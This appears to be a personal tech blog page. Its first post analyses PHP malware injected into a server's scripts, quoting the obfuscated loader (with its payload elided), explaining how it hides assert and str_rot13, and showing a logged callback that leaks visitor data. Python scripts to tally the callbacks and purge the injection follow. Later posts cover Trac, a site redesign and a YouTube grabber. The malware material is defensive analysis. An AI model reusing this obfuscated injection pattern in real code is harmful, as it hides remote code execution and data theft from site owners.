Battle against injected PHP

My main personal web server became infected with some effin malware that was injected into very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me; it took me a little while to figure out what it does. The string concatenations build the function names assert and str_rot13 so that neither appears literally in the file; str_rot13 turns the rot13'd text back into eval(base64_decode("...")), and assert() then runs that string as PHP. In effect it causes basic system info for anyone browsing sites on that server (their IP, the page they requested and their user agent) to be sent off to some other php script on another server. At first I altered the server and my network so that none of that traffic could reach its intended target; instead I captured it so I could get a look at the volume of it. Here's an example apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"
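Once the callbacks are being captured, the interesting question is how much traffic there is and which sites and visitors it comes from. The following is an added example (not code from the original post) that pulls the exfiltrated fields out of log lines like the one above and tallies them. The first sample line is the one quoted above; the other three are constructed. The collector path /get.php and the field names ip, d, u, i and h are taken from that line; everything else is assumed.

```python
"""Tally the malware's callback traffic from Apache access-log lines.

Added example, not code from the original post. SAMPLE_LOG[0] is the line
quoted in the post; the remaining lines are constructed.
"""
from __future__ import annotations

import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

COLLECTOR_PATH = "/get.php"  # from the post's log line

# Layout of the post's log line: - (client) - - [ts] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'\((?P<client>[^)]+)\).*?\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})'
)

SAMPLE_LOG = [
    # quoted in the post
    '- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"',
    # constructed: a human visitor on the same site
    '- (127.0.0.1) - - [13/Nov/2016:14:02:05 -0700] "GET /get.php?ip=198.51.100.7&d=mysite.com%2Fabout%2F&u=Mozilla%2F5.0+%28Windows+NT+10.0%29&i=1&h=00000000000000000000000000000000 HTTP/1.0" 404 466 "-" "-"',
    # constructed: a crawler on a second infected site
    '- (127.0.0.1) - - [13/Nov/2016:14:02:40 -0700] "GET /get.php?ip=203.0.113.9&d=othersite.example%2F&u=Googlebot%2F2.1&i=1&h=11111111111111111111111111111111 HTTP/1.0" 404 466 "-" "-"',
    # constructed: unrelated request that must be ignored
    '- (127.0.0.1) - - [13/Nov/2016:14:03:00 -0700] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]


def parse_callback(line: str) -> dict | None:
    """Return the exfiltrated fields of one callback request, or None for any other line."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != COLLECTOR_PATH:
        return None
    q = parse_qs(url.query)  # percent-decodes values and turns '+' into spaces

    def first(key: str) -> str:
        return q.get(key, [""])[0]

    page = first("d")  # "d" carries host/path of the infected page the visitor loaded
    return {
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "visitor_ip": first("ip"),
        "site": page.split("/", 1)[0],
        "page": page,
        "user_agent": first("u"),
        "hash": first("h"),
    }


def summarize(lines: list[str]) -> dict:
    """Aggregate callbacks by infected site and by visitor; count crawler traffic separately."""
    callbacks = [c for c in (parse_callback(l) for l in lines) if c is not None]
    return {
        "callbacks": len(callbacks),
        "by_site": Counter(c["site"] for c in callbacks),
        "by_visitor": Counter(c["visitor_ip"] for c in callbacks),
        "crawlers": sum("bot" in c["user_agent"].lower() for c in callbacks),
    }


if __name__ == "__main__":
    import sys

    lines = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_LOG
    report = summarize(lines)
    print(f"{report['callbacks']} callbacks, {report['crawlers']} from crawlers")
    for site, n in report["by_site"].most_common():
        print(f"  {n:6d}  {site}")
```

Feed it the captured access log on stdin to see which vhosts are actually serving the injected code and how much of the traffic is search-engine crawlers rather than real visitors; on the sample above two of three callbacks come from bots.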

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.
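The author's searchAndDestroy script is not reproduced on this page. What follows is an added example of the same kind of cleanup, written for this page and not the author's code: it walks a web root, strips every block between the //###=CACHE START=### and //###=CACHE END=### markers quoted above, keeps a copy of each infected original in a quarantine directory, and flags files where only one marker survives so they can be reviewed by hand. The marker strings are from the injected snippet above; the function names, the quarantine layout and the sample file contents are assumptions.

```python
"""Strip the marker-delimited injected block from PHP files under a directory.

Added example, not the author's searchAndDestroy script. Only the two marker
strings come from the post; the rest is assumed.
"""
from __future__ import annotations

import re
import shutil
import sys
from pathlib import Path

START = "//###=CACHE START=###"
END = "//###=CACHE END=###"

# Non-greedy with DOTALL so one match covers exactly one block even when the
# file holds several; the trailing newline is consumed so no blank line is left.
BLOCK_RE = re.compile(
    re.escape(START) + r".*?" + re.escape(END) + r"[ \t]*\r?\n?", re.DOTALL
)

# Constructed sample: a legitimate file with the injected block at the top.
SAMPLE_INFECTED = (
    "<?php\n"
    f"{START}\n"
    "@error_reporting(E_ALL);\n"
    '@ini_set("error_log",NULL);\n'
    '$strings = "as"; $strings .= "se";  $strings .= "rt";\n'
    f"{END}\n"
    'echo "hello, legitimate site";\n'
)


def strip_injected(text: str) -> tuple[str, int]:
    """Return (cleaned_text, number_of_blocks_removed)."""
    return BLOCK_RE.subn("", text)


def has_orphan_marker(text: str) -> bool:
    """True if a START or END marker remains after stripping, i.e. the block was
    truncated or edited and needs a human look rather than an automatic fix."""
    cleaned, _ = strip_injected(text)
    return START in cleaned or END in cleaned


def clean_tree(root: Path, quarantine: Path, dry_run: bool = True) -> dict:
    """Walk root for *.php, strip blocks, copy each infected original under quarantine."""
    report = {"scanned": 0, "infected": 0, "blocks": 0, "review": []}
    for path in root.rglob("*.php"):
        report["scanned"] += 1
        try:
            original = path.read_text(encoding="utf-8", errors="surrogateescape")
        except OSError:
            continue
        cleaned, n = strip_injected(original)
        if has_orphan_marker(original):
            report["review"].append(str(path))
        if n == 0:
            continue
        report["infected"] += 1
        report["blocks"] += n
        if not dry_run:
            dest = quarantine / path.relative_to(root)
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, dest)  # keep the evidence before touching the file
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
        print(f"{'would clean' if dry_run else 'cleaned'}: {path} ({n} block(s))")
    return report


if __name__ == "__main__":
    # usage: python clean_php.py /var/www /root/quarantine [--apply]
    root, quarantine = Path(sys.argv[1]), Path(sys.argv[2])
    result = clean_tree(root, quarantine, dry_run="--apply" not in sys.argv)
    print(result)
```

Run it without --apply first: the dry run lists what would change, and anything under "review" is a file where a marker is present but the block did not match cleanly, which is exactly the case a blind regex should not touch. Removing the block also leaves intact whatever else the attacker may have dropped outside the markers, so treat this as a first pass, not proof the host is clean.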

Dear Diary: Running Trac and upgrading to Ubuntu Server 14.04

I’m a fairly heavy user of trac. I’ve got various software projects I organize using trac. I decided to upgrade one of my Ubuntu 12.04 servers to Ubuntu 14.04 and of course ran into the typical apache2 headaches born of this particular transition.

After remembering to rename my virtual host files with .conf extensions (I find that change annoying as hell on its own), I kept running aground on an Internal Server Error message for which I couldn’t find even a hint in my logs, even after cranking up the verbosity.

SIGH


Trac Authenticating Through Active Directory

A minor post – mostly for my own notes.

I was setting up an instance of Trac and I wanted Active Directory authentication going. I’ve had this before, but I recently learned of Centrify which provides a VERY easy means to setup system authentication with AD. This meant I needed to find a Centrify-specific way to get AD authentication going in Trac.

I was close to an obvious simple solution for a fair while, but I kept running into error messages like:

[error] [client jay] GROUP: mrjay not in required group(s)., referer: http://trac/

Here are the steps I followed that not only got this far, but got past this error and through to working just fine…

Dawning.ca Spruced Up

Previous Dawning.ca Layout

I’ve just spent a few hours re-designing the layout of Dawning.ca. The old one served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup… As you can see to the right, the new style is fairly different compared to the image. Although I kept the workflow as I think it was already pretty good.

Objectives

Basically, I was trying to get the site to be:

  • Simple to use
  • Uncluttered
  • Attractive
  • Professional & Casual
  • Technically Interesting
  • Simple to use
  • Did I mention, simple to use?

I feel I accomplished these goals, though I felt I had to sacrifice some technically interesting features in order to reduce the clutter. I had made some cool logos a while ago that looked good on the more cartoony past version of the site, but they looked horrible here. I ultimately decided to just get rid of the top banner altogether; I don’t think people need to keep being reminded of what site they’re on. Anyway, comment below eh!?

Technical Blah

I’m using a few css tricks I’ve learned in the last while to round corners, shade and pretty things up. Mainly, for rounded corners I use tricks such as those found here.

In terms of the shading, if you look carefully at my setup, the black gradient on the red background is made from a 1 x 200 px png image file overlaid on a red background. The CSS for that trick looks like this:

background-image: url('/media/bkgd.png');
background-repeat: repeat-x;

Most shaded regions are made using repeated 10 x 10 px png images that are very transparent. I use css nearly identical to that above for this too; the only difference is that the repeat statement has no -x on it.

I built up the new theme using the very famous and helpful Atahualpa theme. I’ve used this theme for various WordPress websites of mine including those for:

Also, my buddy Devin, who I recently helped get his first Apache/MySQL/PHP/WordPress server install going, is using the Atahualpa Theme for his website. It truly is a great WordPress theme for advanced users and beginners alike.

Your Turn

What do you all think of my redesign? Any suggestions? What WordPress theme do you use?

YouTube Grabber App

I’ve whipped up this little YouTube video grabber for myself and I’ve opened it up for the moment. If I see it getting spammed or abused in some way, I’ll probably password protect it, nevertheless, you can check it out here.

What it does

This little app takes a YouTube video link and then adds the reference to a database. A separate script then polls that database and looks for new URLs. It then uses another script (that I did not write), called yt-download, to fetch each video and dump it to my fileserver.

How it does it

I wrote this application using Django (and therefore Python). Django provides a lot of really helpful database abstraction, along with various helpful tools for custom web administration of databases and for rapidly creating presentations. I’m sure a true Django expert would say it does even more.

In addition to Django, my little application runs on an Ubuntu Linux based webserver I run as a Virtual Machine.

The actual fetching of the videos is handled by a script I wrote that uses the Django database framework. It’s just a few lines and is called by cron.

What it can do for you

Provided people don’t abuse this thing, I don’t mind them submitting videos for the purpose of getting at the mp4 links on the video pages. Of course you can also use it to point me to content that you think is awesome.